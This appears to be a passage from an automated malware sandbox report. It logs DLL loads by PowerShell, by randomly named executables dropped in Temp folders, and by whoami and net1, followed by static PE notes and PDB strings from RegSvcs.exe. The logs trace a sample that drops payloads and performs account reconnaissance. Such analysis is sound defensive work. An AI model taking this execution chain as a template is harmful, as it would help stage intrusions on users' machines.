Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ondemandconnroutehelper.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static file information: File size 3238912 > 1048576

Source: file.exe

Static PE information: Raw size of lstatpgb is bigger than: 0x100000 < 0x2ab000

Source:	Binary string: $$.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdbr source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\ClientAny.pdbpdbAny.pdbe source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?oC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegSvcs.pdblyF source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Development\Releases\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: H3tyh96.exe, 00000007.00000002.3359474514.0000000005256000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005EFF000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005FEF000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3715237584.000000000A840000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3304967833.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbS source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdbegSvcs.pdbpdbvcs.pdbv4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdbp source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BCA000.00000004.00000020.00020000.00000000.sdmp
